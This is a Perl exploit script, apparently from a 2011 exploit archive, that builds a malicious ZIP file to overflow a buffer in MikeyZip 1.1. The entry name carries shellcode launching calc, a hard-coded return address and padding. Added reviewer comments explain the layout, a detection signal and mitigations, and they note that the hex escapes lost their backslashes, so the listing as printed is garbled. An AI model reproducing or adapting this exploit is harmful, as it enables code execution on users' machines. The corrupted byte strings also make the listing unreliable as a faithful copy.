
MikeyZip 1.1 ZIP Buffer Overflow

Posted on 11 April 2011

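#!/usr/bin/perl
#
#
#[+]Exploit Title: MikeyZip 1.1 .ZIP File Buffer Overflow
#[+]Date: 1042011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.softpedia.com/get/Compression-tools/MikeyZip.shtml
#[+]Version: 1.1
#[+]Tested On: WIN-XP SP3 Brazil Portuguese
#[+]CVE: N/A
#
#
#
# Reviewer notes
# - What it shows: the script assembles a ZIP with one entry whose file name
#   is 4064 bytes of crafted data plus ".txt". Per the title, MikeyZip 1.1
#   overflows a buffer while handling that archive; the vulnerable code is
#   not part of this page.
# - Listing fidelity: the hex escapes reached this page without their
#   backslashes ("x50x4B..." instead of escape sequences). As printed, the
#   strings are literal text, so the length arithmetic below does not yield
#   the sizes the author planned.
# - Detection: "xe4x0f" in both headers matches 0x0FE4 = 4068 read
#   little-endian, which equals 4064 + length(".txt"); it appears to be the
#   declared entry-name length. An entry name thousands of bytes long is a
#   strong triage signal for archive scanners and gateways.
# - Mitigation: a parser has to bound the name length against its
#   destination buffer before copying. The return address is hard-coded for
#   one OS build (see the author's comment), so ASLR and DEP also blunt it.
#
use strict;
use warnings;

# NOTE(review): declared but never read; the output path below is "file.zip".
my $filename = "Exploit.zip";

print " MikeyZip 1.1 .ZIP File Buffer Overflow ";
print " Created by C4SS!0 G0M3S ";
# Single-quoted: "@hotmail" inside double quotes is array interpolation and
# does not compile under "use strict".
print ' E-mail Louredo_@hotmail.com ';
print " Site www.exploit-br.org/ ";
print " [+] Creting ZIP File... ";
sleep(1);

# Starts with the local file header signature (50 4B 03 04).
my $head = "x50x4Bx03x04x14x00x00".
"x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"xe4x0f" .
"x00x00x00";

# Starts with the central directory file header signature (50 4B 01 02).
my $head2 = "x50x4Bx01x02x14x00x14".
"x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00x00".
"xe4x0f".
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

# Starts with the end-of-central-directory signature (50 4B 05 06).
my $head3 = "x50x4Bx05x06x00x00x00".
"x00x01x00x01x00".
"x12x10x00x00".
"x02x10x00x00".
"x00x00";

#
#LITTLE SHELLCODE WinExec("calc",0)
#
my $payload = "JJJJJJJJJJJRYVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI03YP0PSXU3512LCSPTPXF0".
"ONTMGUMVSLKON6A";
$payload .= "x41" x (238-length($payload));
$payload .= pack('V',0x774D3E78);#CALL ESP on kernel32.dll WINX-XP SP3
# NOTE(review): the author's comment says 6, the repeat count here is 10.
$payload .= "x61" x 10;#6 x POPAD
$payload .= "x98xe3";#CALL EDX
$payload .= "x41" x (4064-length($payload));
# The crafted data is used as the entry's file name, so it gets an extension.
$payload = $payload.".txt";

# Layout: local header + name, central directory header + name, end record.
my $zip = $head.$payload.$head2.$payload.$head3;

# Three-argument open with a lexical handle: the mode can never be taken
# from the file name, and the handle is not a package-global bareword.
open(my $out, '>', 'file.zip') or die "[-]Error: $! ";
print {$out} $zip;
close($out);
print "[+] ZIP File Created With Sucess:) ";
sleep(3);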

 
